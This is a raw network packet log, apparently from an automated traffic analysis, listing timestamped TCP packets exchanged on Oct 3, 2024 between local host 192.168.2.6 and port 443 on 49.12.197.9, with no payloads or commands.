                                                                                                                                                      Oct 3, 2024 09:16:31.733869076 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.733987093 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.733987093 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.734023094 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.734214067 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.737915993 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.737934113 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.738260984 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.738281965 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.738482952 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.747705936 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.747729063 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.747948885 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.747967958 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.748040915 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.757369041 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.757390976 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.757538080 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.757560015 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.758481979 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.769680023 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.769701004 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.769834042 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.769855976 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.769906998 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.779340029 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.779377937 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.779488087 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.779488087 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.779519081 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.779659986 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.791908979 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.791934967 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.795475006 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.795500994 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.795918941 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.811327934 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.811353922 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.811403990 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.811428070 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.811487913 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.811487913 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.825130939 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.825160980 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.825293064 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.825314999 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.825366974 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.828623056 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.828646898 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.828738928 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.828752041 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.831511021 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.843321085 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.843346119 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.843441010 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.843462944 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.843503952 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.847987890 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.848017931 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.848115921 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.848140001 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.848196030 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.860260963 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.860284090 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.860377073 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.860398054 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.860785961 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.869781017 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.869805098 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.869904041 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.869940996 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.870543003 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.882626057 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.882683039 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.882725954 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.882755041 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.882774115 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.882838011 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.901731968 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.901753902 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.901979923 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.902008057 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.902067900 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.915709972 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.915731907 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.915832996 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.915858984 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.915921926 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.919290066 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.919308901 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.921494007 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.921514988 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.921600103 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.933696985 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.933717012 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.933815002 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.933835983 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.939496994 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.945833921 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.945853949 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.945962906 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.945986032 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.949987888 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.950896025 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.950917006 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.951028109 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.951040030 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.951514959 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.960951090 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.960973024 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.961054087 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.961077929 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.963488102 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.973463058 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.973481894 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.973572969 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.973597050 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.975502968 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.992405891 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.992436886 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.992563963 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:31.992588043 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:31.993591070 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.006504059 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.006526947 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.006877899 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.006906033 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.007246017 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.010108948 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.010127068 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.010282040 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.010296106 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.010346889 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.024523973 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.024544001 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.024715900 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.024728060 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.024983883 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.037084103 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.037110090 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.037452936 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.037463903 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.037528038 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.043620110 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.043637991 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.043905973 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.043911934 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.045653105 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.054689884 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.054707050 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.054872990 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.054883957 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.054991007 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.069103003 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.069128036 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.069251060 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.069258928 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.069303989 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.096096992 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.096117973 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.096318007 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.096328020 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.096399069 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.099626064 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.099653006 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.099771023 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.099776983 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.099910021 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.105078936 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.105113983 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.105180025 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.105191946 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.105216026 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.105422020 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.115526915 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.115549088 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.115643978 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.115654945 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.115729094 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.133848906 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.133869886 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.133987904 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.133996964 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.134476900 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.134855986 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.134872913 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.135027885 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.135034084 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.135190964 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.145469904 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.145502090 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.147439003 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.147464991 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.147810936 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.159982920 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.160012960 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.160201073 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.160218954 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.162842989 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.186785936 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.186813116 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.186994076 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.187021017 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.187403917 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.190649033 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.190676928 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.191241980 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.191251040 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.191303968 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.195785999 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.195813894 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.195904016 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.195915937 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.198023081 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.206024885 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.206047058 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.206175089 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.206185102 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.206371069 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.224667072 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.224690914 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.224873066 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.224905968 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.225035906 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.225961924 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.225979090 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.226239920 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.226259947 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.226375103 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.236154079 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.236177921 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.236331940 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.236361027 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.236416101 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.250576019 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.250603914 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.250860929 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.250893116 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.250950098 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.277666092 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.277697086 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.277931929 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.277965069 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.278057098 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.281250954 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.281275988 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.281481028 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.281502008 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.283406019 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.286437035 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.286463976 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.286700010 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.286720991 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.287408113 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.296973944 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.297003031 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.297100067 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.297136068 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.297151089 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.297182083 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.315423965 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.315447092 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.315574884 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.315606117 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.316529036 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.316550970 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.316570997 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.316586018 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.316653013 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.316653013 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.327260017 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.327289104 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.327501059 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.327522039 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.327569008 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.341713905 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.341734886 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.341835022 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.341856956 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.341902018 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.368522882 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.368546963 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.368654966 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.368683100 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.368725061 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.372279882 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.372302055 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.372417927 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.372437000 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.372482061 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.377791882 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.377815962 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.377873898 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.377893925 CEST4434973749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:32.377932072 CEST49737443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:32.389425039 CEST4434973749.12.197.9192.168.2.6
